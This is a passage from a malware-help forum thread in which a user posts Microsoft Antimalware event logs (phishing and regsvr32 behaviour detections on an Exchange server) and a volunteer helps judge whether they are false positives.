  Path: file:_C:\Program Files\Trend Micro\Smex\temp\VSGK1T9K.000->(SCRIPT0000)
  Detection Origin: Local machine
  Detection Type: Concrete
  Detection Source: Real-Time Protection
  User: NT AUTHORITY\SYSTEM
  Process Name: C:\Program Files\Trend Micro\Smex\SMEX_Master.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
 

 

Event Type: Warning
Event Source: Microsoft Antimalware
Event Category: None
Event ID: 1116
Date: 9/14/2017
Time: 3:53:26 AM
User: N/A
Computer: CCDC-EXCH-01
Description:
Microsoft Antimalware has detected malware or other potentially unwanted software.
 For more information please see the following:
  Name: PWS:HTML/Phish
  ID: 2147690338
  Severity: Severe
  Category: Password Stealer
  Path: file:_C:\Program Files\Trend Micro\Smex\temp\VSBVO3HG.000
  Detection Origin: Local machine
  Detection Type: Concrete
  Detection Source: Real-Time Protection
  User: NT AUTHORITY\SYSTEM
  Process Name: C:\Program Files\Trend Micro\Smex\SMEX_Master.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
 
 
 
Event Type: Warning
Event Source: Microsoft Antimalware
Event Category: None
Event ID: 1116
Date: 9/13/2017
Time: 6:27:28 AM
User: N/A
Computer: CCDC-EXCH-01
Description:
Microsoft Antimalware has detected malware or other potentially unwanted software.
 For more information please see the following:
  Name: PWS:HTML/Phish
  ID: 2147690338
  Severity: Severe
  Category: Password Stealer
  Path: file:_C:\Program Files\Trend Micro\Smex\temp\VS1SHSHP.000->(SCRIPT0000)
  Detection Origin: Local machine
  Detection Type: Concrete
  Detection Source: Real-Time Protection
  User: NT AUTHORITY\SYSTEM
  Process Name: C:\Program Files\Trend Micro\Smex\SMEX_Master.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
 
 
 
 
Event Type: Warning
Event Source: Microsoft Antimalware
Event Category: None
Event ID: 1116
Date: 9/13/2017
Time: 3:53:59 AM
User: N/A
Computer: CCDC-EXCH-01
Description:
Microsoft Antimalware has detected malware or other potentially unwanted software.
 For more information please see the following:
  Name: PWS:HTML/Phish
  ID: 2147690338
  Severity: Severe
  Category: Password Stealer
  Path: file:_C:\Program Files\Trend Micro\Smex\temp\VS3L1VE2.000
  Detection Origin: Local machine
  Detection Type: Concrete
  Detection Source: Real-Time Protection
  User: NT AUTHORITY\SYSTEM
  Process Name: C:\Program Files\Trend Micro\Smex\SMEX_Master.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
 

Thanks



#12 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,681 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:07 AM

Posted 14 September 2017 - 01:26 PM

Looks like FP to me since they are located in a temp folder of Trend Micro, most likely where it drops suspicious/phishy emails.

If you open the Event Viewer, do you have any errors from lsmose.exe that dates from September 12th, 13th and 14th?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#13 adalta

adalta
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:07 PM

Posted 14 September 2017 - 02:21 PM

No errors from lsmose.exe from September 12, 13, 14 although I do see the following regsvr32.exe entry from 9/12. All other entries during 9/12-9/14 deal with the C:\Program Files\Trend Micro\Smex\temp\ folder and the C:\Program Files\Trend Micro\Smex\SMEX_Master.exe file.

 

 

Event Type: Warning
Event Source: Microsoft Antimalware
Event Category: None
Event ID: 1116
Date: 9/12/2017
Time: 5:32:03 PM
User: N/A
Computer: CCDC-EXCH-01
Description:
Microsoft Antimalware has detected malware or other potentially unwanted software.
 For more information please see the following:
  Name: Behavior:Win32/Powemet.B!attk
  ID: 2147722898
  Severity: Severe
  Category: Suspicious Behavior
  Path: behavior:_pid:10044:94227975697806;process:_pid:10044
  Detection Origin: Unknown
  Detection Type: Concrete
  Detection Source: System
  User: NT AUTHORITY\SYSTEM
  Process Name: C:\WINDOWS\system32\regsvr32.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
 
Thanks


#14 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,681 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:07 AM

Posted 14 September 2017 - 02:59 PM

And it occured only once?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#15 adalta

adalta
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:07 PM

Posted 14 September 2017 - 04:55 PM

Yes, Just once since 9/12/2017.

 

I'm not seeing anything abnormal in the Event Logs now. Are there any other scans or steps to confirm the infection was removed?






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users